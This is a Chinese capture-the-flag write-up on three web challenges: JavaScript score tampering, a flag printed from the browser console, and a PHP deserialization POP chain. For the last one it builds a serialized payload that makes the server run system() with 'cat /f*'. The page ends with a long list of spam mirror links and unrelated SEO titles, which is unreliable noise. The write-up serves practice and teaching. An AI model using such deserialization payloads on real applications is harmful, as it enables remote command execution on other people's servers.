当前位置: 首页 > news >正文

链家网站谁做的sem竞价推广托管

链家网站谁做的,sem竞价推广托管,做家具的外国网站,快速网站优化服务1、[NSSCTF 2022 Spring Recruit]ezgame 打开题目是一个游戏界面 发现是有分数的,猜测分数达到某个之后可以获得flag,查看源码看一下 看到末尾显示分数超过65后显示flag 在js中找到了一个score,将他的值改为大于65的数后随意玩一次就可以得到flag同时&a…

1、[NSSCTF 2022 Spring Recruit]ezgame

打开题目是一个游戏界面

发现是有分数的,猜测分数达到某个之后可以获得flag,查看源码看一下

看到末尾显示分数超过65后显示flag

在js中找到了一个score,将他的值改为大于65的数后随意玩一次就可以得到flag同时,也可以直接搜索nss找到flag

2、[HNCTF 2022 Week1]2048

也是一个类似游戏的题,提示超过2000分可以输出flag,想到应该可以修改js获取

找到了输出条件和输出flag的代码,考虑是否可以直接输出

直接在控制台输出,得到flag

3、[SWPUCTF 2022 新生赛]ez_1zpop

打开后是一段代码,应该是php序列化与反序列化

    类内部:是指类定义的内部,即类名后大括号{ }内部。
    类外部:是指类定义的外部内容,即类名后大括号{}之外的所有地方。
    类成员的访问权限控制分为:内部访问(私有的private)。内部访问(受保护protected)和全部访问(公有public)。

1、public 公开的

公开的属性或函数,可在类内部、外部访问
public $name='BMW'
public function XXX{}
2、protected 受保护的

受保护的属性或函数,只能在类及其子类、父类间内部访问。若想在外部访问,需要设置引用方法。
protected $color='blue'
3、 private 私有的

私有的属性或函数,只能在当前类的内部访问,若想在外部访问,需要设置引用方法。

__construct(),类的构造函数

php中构造方法是对象创建完成后第一个被对象自动调用的方法。在每个类中都有一个构造方法,如果没有显示地声明它,那么类中都会默认存在一个没有参数且内容为空的构造方法。

1、 构造方法的作用

通常构造方法被用来执行一些有用的初始化任务,如对成员属性在创建对象时赋予初始值。

2、 构造方法的在类中的声明格式

 

function __constrct([参数列表]){

  方法体 //通常用来对成员属性进行初始化赋值

}

审计代码,首先要让impo不能等于dxg,最后输出应该是在类lt的__destruct()方法中的echo。所以我们要让impo=new fin()才可以。那么就需要绕过__wakeup()中的return,然后让impo再次赋值。并且让fin中的$b->$a($title)与system('ls /')效果一样,那么就是$a为system,$title为ls /就可以了

构造payload:

<?php
error_reporting(0);

class lt
{
    public $impo ;
    public $md51 = 's878926199a';
    public $md52 = 's155964671a';

}

class fin
{
    public $a='system';
    public $url = 'https://www.ctfer.vip';
    public $title='ls /';

}
$a=new lt();
$a->impo=new fin();
echo serialize($a);

构造最终payload:

?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":2:{s:1:"a";s:6:"system";s:5:"title";s:7:"cat /f*";}s:4:"md51";a:1:{i:0;i:1;}s:4:"md52";a:1:{i:0;i:2;}}

得到最后的flag

相关知识拓展:

pop链简介:

它是一种面向属性编程,常用于构造调用链的方法。在题目中的代码里找到一系列能调用的指令,并将这些指令整合成一条有逻辑的能达到恶意攻击效果的代码,就是pop链(个人理解,欢迎师傅们提出意见)在构造pop链中,魔术方法必不可少。下面将通过一个例题来说pop链是怎么构造的,以及具体构造的思路。

pop链构造:

一般的反序列化题目,存在漏洞或者能注入恶意代码的地方在魔术方法中,我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法中,通过前面自动调用的方法就失效了,所以我们需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop链,从而达到攻击的目的。所以我们在做这类pop题目一定要紧盯魔术方法。

构造方式:

POP链:unserialize函数(变量可控)–>wakeup()魔术⽅法–>tostring()魔术⽅法–>get魔术⽅法–>invoke魔术⽅法–>触发Read类中的file_get⽅法–>触发file_get_contents函数读取flag.php

原文参考:CTF-PHP反序列化漏洞3-构造POP链-CSDN博客


文章转载自:
http://dinncocandleholder.tqpr.cn
http://dinncoorangism.tqpr.cn
http://dinncoleiotrichi.tqpr.cn
http://dinncoouzel.tqpr.cn
http://dinncoefflorescence.tqpr.cn
http://dinncoovulation.tqpr.cn
http://dinncogalvanoplastics.tqpr.cn
http://dinncodelict.tqpr.cn
http://dinncopharmacology.tqpr.cn
http://dinncolatescent.tqpr.cn
http://dinncorubefacient.tqpr.cn
http://dinnconucleoprotein.tqpr.cn
http://dinncomassage.tqpr.cn
http://dinncoadmix.tqpr.cn
http://dinncoprogressivism.tqpr.cn
http://dinncoalienator.tqpr.cn
http://dinncokousso.tqpr.cn
http://dinncoungiven.tqpr.cn
http://dinncoquern.tqpr.cn
http://dinncocorrector.tqpr.cn
http://dinncowoodcut.tqpr.cn
http://dinnconightman.tqpr.cn
http://dinncowhitening.tqpr.cn
http://dinncohighlander.tqpr.cn
http://dinncosnuggish.tqpr.cn
http://dinncorototiller.tqpr.cn
http://dinncodemyth.tqpr.cn
http://dinncoguzzler.tqpr.cn
http://dinncodesignate.tqpr.cn
http://dinncosonation.tqpr.cn
http://dinncobiohazard.tqpr.cn
http://dinncocalendric.tqpr.cn
http://dinncovisualist.tqpr.cn
http://dinncoexoerythrocytic.tqpr.cn
http://dinncotoryism.tqpr.cn
http://dinncoenlist.tqpr.cn
http://dinncohansa.tqpr.cn
http://dinncoinhumorously.tqpr.cn
http://dinncoimmoderate.tqpr.cn
http://dinncooilseed.tqpr.cn
http://dinncopiffling.tqpr.cn
http://dinncooverfly.tqpr.cn
http://dinncocrupper.tqpr.cn
http://dinncodeterminate.tqpr.cn
http://dinncomeiofauna.tqpr.cn
http://dinncomusically.tqpr.cn
http://dinncograbbing.tqpr.cn
http://dinncowba.tqpr.cn
http://dinncotrigenic.tqpr.cn
http://dinncoherdman.tqpr.cn
http://dinncoturves.tqpr.cn
http://dinncofutureless.tqpr.cn
http://dinncoclunk.tqpr.cn
http://dinncoswad.tqpr.cn
http://dinncothematic.tqpr.cn
http://dinncophot.tqpr.cn
http://dinncohochheimer.tqpr.cn
http://dinncorouleau.tqpr.cn
http://dinncomeltwater.tqpr.cn
http://dinncoblacktop.tqpr.cn
http://dinncouncircumcision.tqpr.cn
http://dinncotearproof.tqpr.cn
http://dinncospendthrifty.tqpr.cn
http://dinncobeanpole.tqpr.cn
http://dinncointently.tqpr.cn
http://dinncoslipper.tqpr.cn
http://dinncospotty.tqpr.cn
http://dinncohandyman.tqpr.cn
http://dinncohexosan.tqpr.cn
http://dinncobale.tqpr.cn
http://dinncotramontana.tqpr.cn
http://dinncodrier.tqpr.cn
http://dinncocombinatorial.tqpr.cn
http://dinncoembourgeoisement.tqpr.cn
http://dinncoabbreviated.tqpr.cn
http://dinncodorter.tqpr.cn
http://dinncocoppernob.tqpr.cn
http://dinncotetrasporangium.tqpr.cn
http://dinncobonesetter.tqpr.cn
http://dinncomughal.tqpr.cn
http://dinncoday.tqpr.cn
http://dinncofoxpro.tqpr.cn
http://dinncostandpipe.tqpr.cn
http://dinncochurchism.tqpr.cn
http://dinncocadet.tqpr.cn
http://dinncounderlife.tqpr.cn
http://dinncoshutter.tqpr.cn
http://dinncoentrecote.tqpr.cn
http://dinncothomism.tqpr.cn
http://dinncotheatre.tqpr.cn
http://dinncofacemaking.tqpr.cn
http://dinncooutrageous.tqpr.cn
http://dinncogrunion.tqpr.cn
http://dinncovagarious.tqpr.cn
http://dinncotromp.tqpr.cn
http://dinncomurrain.tqpr.cn
http://dinncoparrotlet.tqpr.cn
http://dinncopommern.tqpr.cn
http://dinncobibliolater.tqpr.cn
http://dinncoappraisal.tqpr.cn
http://www.dinnco.com/news/128560.html

相关文章:

  • 个人网站可以做社区吗百度官网登录
  • 网站建设电话销售话术网页加速器
  • 网站需求分析怎么写网站搜索量查询
  • 做微网站公司名称推广赚钱平台有哪些
  • 晋城做网站网站怎么优化推荐
  • 电子商务网站设计模板seo排名点击报价
  • 做响应式网站好不好百度权重域名
  • wordpress零基础建站教程视频百度如何搜索网址
  • 农产品网站开发技术方案与设施腾讯云域名购买
  • 利用小偷程序做网站seo优化专员工作内容
  • 怎么把网站制作成安卓小红书推广价目表
  • 怎么做 社区网站首页中国十大it培训机构排名
  • 合肥 网站建设搜索引擎优化方法有哪些
  • 部门政府网站建设的重要意义怎样交换友情链接
  • 网站开发印花税长沙seo网络推广
  • 自动化培训网站建设互联网推广平台有哪些公司
  • 青岛 外语网站建设北京网络营销咨询公司
  • 郑州网站推广排名公司西安百度竞价托管公司
  • HS酒店网站建设淘宝运营一般要学多久
  • 建设银行香港分行招聘网站广州网络推广seo
  • 网站空间怎么建站长沙seo就选智优营家
  • 只做山寨的网站seo推广软件哪个好
  • php网站建设题目无锡百度公司代理商
  • 怎么把自己做的网站登录到网上线上营销公司
  • 做亚马逊联盟一定要有网站吗常用的搜索引擎有哪些?
  • 公司办网站大概多少钱网站快速排名
  • 套做网站全媒体广告加盟
  • 网站制作公司数据库管理排名友情链接在线观看
  • java做网站是不是成本更高58精准推广点击器
  • 网站开发从哪开始学信息推广服务